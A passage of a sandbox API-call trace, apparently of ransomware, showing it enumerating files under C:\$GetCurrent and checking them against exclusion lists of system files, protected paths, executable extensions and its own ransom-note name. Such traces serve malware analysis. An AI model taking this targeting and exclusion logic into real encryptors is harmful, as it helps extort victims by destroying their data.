returned="C:\\$GetCurrent\\Logs" [0070.811] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\") returned="C:\\$GetCurrent\\Logs\\" [0070.811] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs\\", psz2="PartnerSetupCompleteResult.log", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" [0070.811] PathFindExtensionW (pszPath="PartnerSetupCompleteResult.log") returned=".log" [0070.811] StrCmpW (psz1=".log", psz2=".txd0t") returned -1 [0070.811] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="bootsect.bak") returned 1 [0070.811] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="iconcache.db") returned 1 [0070.811] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="thumbs.db") returned -1 [0070.811] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2=" ransomware ") returned 1 [0070.811] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2=" ransom ") returned 1 [0070.811] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="debug.txt") returned 1 [0070.811] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="boot.ini") returned 1 [0070.811] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="desktop.ini") returned 1 [0070.811] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="autorun.inf") returned 1 [0070.812] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="ntuser.dat") returned 1 [0070.812] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="ntldr") returned 1 [0070.812] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="ntdetect.com") returned 1 [0070.812] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="bootfont.bin") returned 1 [0070.812] StrCmpIW (psz1="PartnerSetupCompleteResult.log", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.812] PathFindExtensionW (pszPath="PartnerSetupCompleteResult.log") returned=".log" [0070.812] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".log") returned 0x0 [0070.812] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0070.812] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0070.812] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0070.812] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0070.812] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0070.812] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0070.812] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 0 [0070.812] FindClose (in: hFindFile=0xec2670 | out: hFindFile=0xec2670) returned 1 [0070.813] GetProcessHeap () returned 0xe30000 [0070.813] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7308 | out: hHeap=0xe30000) returned 1 [0070.813] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0070.813] StrCmpW (psz1="SafeOS", psz2=".") returned 1 [0070.813] StrCmpW (psz1="SafeOS", psz2="..") returned 1 [0070.813] StrCpyNW (in: psz1=0xec5e58, psz2="C:\\$GetCurrent", cchMax=1054 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0070.813] StrNCatW (in: psz1="C:\\$GetCurrent", psz2="\\", cchMax=1054 | out: psz1="C:\\$GetCurrent\\") returned="C:\\$GetCurrent\\" [0070.813] StrNCatW (in: psz1="C:\\$GetCurrent\\", psz2="SafeOS", cchMax=1054 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\system32\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\syswow64\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\system\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\winsxs\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\appdata\\roaming\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\appdata\\local\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\appdata\\locallow\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\all users\\microsoft\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\inetpub\\logs\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\boot\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\perflogs\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\programdata\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\drivers\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\wsus\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\efstmpwp\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\$recycle.bin\\") returned 0x0 [0070.813] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="crypt_detect") returned 0x0 [0070.814] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="cryptolocker") returned 0x0 [0070.814] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="ransomware") returned 0x0 [0070.814] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="C:\\WINDOWS") returned 0x0 [0070.814] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="C:\\Program Files (x86)") returned 0x0 [0070.814] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="C:\\Program Files") returned 0x0 [0070.814] GetProcessHeap () returned 0xe30000 [0070.814] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xec7308 [0070.814] StrCpyNW (in: psz1=0xec7308, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0070.814] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\*", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\*") returned="C:\\$GetCurrent\\SafeOS\\*" [0070.814] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec27b0 [0070.819] StrCmpW (psz1=".", psz2=".") returned 0 [0070.819] FindNextFileW (in: hFindFile=0xec27b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.819] StrCmpW (psz1="..", psz2=".") returned 1 [0070.819] StrCmpW (psz1="..", psz2="..") returned 0 [0070.819] FindNextFileW (in: hFindFile=0xec27b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0070.819] StrCmpW (psz1="GetCurrentOOBE.dll", psz2=".") returned 1 [0070.819] StrCmpW (psz1="GetCurrentOOBE.dll", psz2="..") returned 1 [0070.819] StrCpyNW (in: psz1=0xec7308, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0070.819] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0070.819] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="GetCurrentOOBE.dll", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" [0070.819] PathFindExtensionW (pszPath="GetCurrentOOBE.dll") returned=".dll" [0070.819] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0070.819] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="bootsect.bak") returned 1 [0070.819] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="iconcache.db") returned -1 [0070.819] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="thumbs.db") returned -1 [0070.819] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2=" ransomware ") returned 1 [0070.819] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2=" ransom ") returned 1 [0070.819] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="debug.txt") returned 1 [0070.819] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="boot.ini") returned 1 [0070.819] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="desktop.ini") returned 1 [0070.819] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="autorun.inf") returned 1 [0070.819] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="ntuser.dat") returned -1 [0070.819] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="ntldr") returned -1 [0070.820] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="ntdetect.com") returned -1 [0070.820] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="bootfont.bin") returned 1 [0070.820] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.820] PathFindExtensionW (pszPath="GetCurrentOOBE.dll") returned=".dll" [0070.820] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0070.820] FindNextFileW (in: hFindFile=0xec27b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0070.820] StrCmpW (psz1="GetCurrentRollback.ini", psz2=".") returned 1 [0070.820] StrCmpW (psz1="GetCurrentRollback.ini", psz2="..") returned 1 [0070.820] StrCpyNW (in: psz1=0xec7308, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0070.820] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0070.820] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="GetCurrentRollback.ini", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" [0070.820] PathFindExtensionW (pszPath="GetCurrentRollback.ini") returned=".ini" [0070.820] StrCmpW (psz1=".ini", psz2=".txd0t") returned -1 [0070.820] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="bootsect.bak") returned 1 [0070.820] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="iconcache.db") returned -1 [0070.820] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="thumbs.db") returned -1 [0070.820] StrCmpIW (psz1="GetCurrentRollback.ini", psz2=" ransomware ") returned 1 [0070.820] StrCmpIW (psz1="GetCurrentRollback.ini", psz2=" ransom ") returned 1 [0070.820] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="debug.txt") returned 1 [0070.820] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="boot.ini") returned 1 [0070.820] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="desktop.ini") returned 1 [0070.820] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="autorun.inf") returned 1 [0070.820] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="ntuser.dat") returned -1 [0070.820] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="ntldr") returned -1 [0070.820] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="ntdetect.com") returned -1 [0070.820] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="bootfont.bin") returned 1 [0070.820] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.820] PathFindExtensionW (pszPath="GetCurrentRollback.ini") returned=".ini" [0070.820] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ini") returned 0x0 [0070.820] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0070.820] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0070.821] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0070.821] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0070.821] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0070.821] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0070.821] FindNextFileW (in: hFindFile=0xec27b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0070.821] StrCmpW (psz1="PartnerSetupComplete.cmd", psz2=".") returned 1 [0070.821] StrCmpW (psz1="PartnerSetupComplete.cmd", psz2="..") returned 1 [0070.821] StrCpyNW (in: psz1=0xec7308, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0070.821] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0070.821] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="PartnerSetupComplete.cmd", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" [0070.821] PathFindExtensionW (pszPath="PartnerSetupComplete.cmd") returned=".cmd" [0070.821] StrCmpW (psz1=".cmd", psz2=".txd0t") returned -1 [0070.821] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="bootsect.bak") returned 1 [0070.821] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="iconcache.db") returned 1 [0070.821] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="thumbs.db") returned -1 [0070.821] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2=" ransomware ") returned 1 [0070.821] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2=" ransom ") returned 1 [0070.821] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="debug.txt") returned 1 [0070.821] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="boot.ini") returned 1 [0070.821] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="desktop.ini") returned 1 [0070.821] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="autorun.inf") returned 1 [0070.821] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="ntuser.dat") returned 1 [0070.821] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="ntldr") returned 1 [0070.821] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="ntdetect.com") returned 1 [0070.821] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="bootfont.bin") returned 1 [0070.821] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.821] PathFindExtensionW (pszPath="PartnerSetupComplete.cmd") returned=".cmd" [0070.821] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".cmd") returned=".cmd|.url|.mui" [0070.821] FindNextFileW (in: hFindFile=0xec27b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0070.821] StrCmpW (psz1="preoobe.cmd", psz2=".") returned 1 [0070.821] StrCmpW (psz1="preoobe.cmd", psz2="..") returned 1 [0070.821] StrCpyNW (in: psz1=0xec7308, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0070.821] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0070.822] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="preoobe.cmd", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" [0070.822] PathFindExtensionW (pszPath="preoobe.cmd") returned=".cmd" [0070.822] StrCmpW (psz1=".cmd", psz2=".txd0t") returned -1 [0070.822] StrCmpIW (psz1="preoobe.cmd", psz2="bootsect.bak") returned 1 [0070.822] StrCmpIW (psz1="preoobe.cmd", psz2="iconcache.db") returned 1 [0070.822] StrCmpIW (psz1="preoobe.cmd", psz2="thumbs.db") returned -1 [0070.822] StrCmpIW (psz1="preoobe.cmd", psz2=" ransomware ") returned 1 [0070.822] StrCmpIW (psz1="preoobe.cmd", psz2=" ransom ") returned 1 [0070.822] StrCmpIW (psz1="preoobe.cmd", psz2="debug.txt") returned 1 [0070.822] StrCmpIW (psz1="preoobe.cmd", psz2="boot.ini") returned 1 [0070.822] StrCmpIW (psz1="preoobe.cmd", psz2="desktop.ini") returned 1 [0070.822] StrCmpIW (psz1="preoobe.cmd", psz2="autorun.inf") returned 1 [0070.822] StrCmpIW (psz1="preoobe.cmd", psz2="ntuser.dat") returned 1 [0070.822] StrCmpIW (psz1="preoobe.cmd", psz2="ntldr") returned 1 [0070.822] StrCmpIW (psz1="preoobe.cmd", psz2="ntdetect.com") returned 1 [0070.822] StrCmpIW (psz1="preoobe.cmd", psz2="bootfont.bin") returned 1 [0070.822] StrCmpIW (psz1="preoobe.cmd", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.822] PathFindExtensionW (pszPath="preoobe.cmd") returned=".cmd" [0070.822] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".cmd") returned=".cmd|.url|.mui" [0070.822] FindNextFileW (in: hFindFile=0xec27b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0070.822] StrCmpW (psz1="SetupComplete.cmd", psz2=".") returned 1 [0070.822] StrCmpW (psz1="SetupComplete.cmd", psz2="..") returned 1 [0070.822] StrCpyNW (in: psz1=0xec7308, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0070.822] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0070.822] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="SetupComplete.cmd", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" [0070.822] PathFindExtensionW (pszPath="SetupComplete.cmd") returned=".cmd" [0070.822] StrCmpW (psz1=".cmd", psz2=".txd0t") returned -1 [0070.822] StrCmpIW (psz1="SetupComplete.cmd", psz2="bootsect.bak") returned 1 [0070.822] StrCmpIW (psz1="SetupComplete.cmd", psz2="iconcache.db") returned 1 [0070.822] StrCmpIW (psz1="SetupComplete.cmd", psz2="thumbs.db") returned -1 [0070.822] StrCmpIW (psz1="SetupComplete.cmd", psz2=" ransomware ") returned 1 [0070.822] StrCmpIW (psz1="SetupComplete.cmd", psz2=" ransom ") returned 1 [0070.822] StrCmpIW (psz1="SetupComplete.cmd", psz2="debug.txt") returned 1 [0070.823] StrCmpIW (psz1="SetupComplete.cmd", psz2="boot.ini") returned 1 [0070.823] StrCmpIW (psz1="SetupComplete.cmd", psz2="desktop.ini") returned 1 [0070.823] StrCmpIW (psz1="SetupComplete.cmd", psz2="autorun.inf") returned 1 [0070.823] StrCmpIW (psz1="SetupComplete.cmd", psz2="ntuser.dat") returned 1 [0070.823] StrCmpIW (psz1="SetupComplete.cmd", psz2="ntldr") returned 1 [0070.823] StrCmpIW (psz1="SetupComplete.cmd", psz2="ntdetect.com") returned 1 [0070.823] StrCmpIW (psz1="SetupComplete.cmd", psz2="bootfont.bin") returned 1 [0070.823] StrCmpIW (psz1="SetupComplete.cmd", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.823] PathFindExtensionW (pszPath="SetupComplete.cmd") returned=".cmd" [0070.823] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".cmd") returned=".cmd|.url|.mui" [0070.823] FindNextFileW (in: hFindFile=0xec27b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0070.823] FindClose (in: hFindFile=0xec27b0 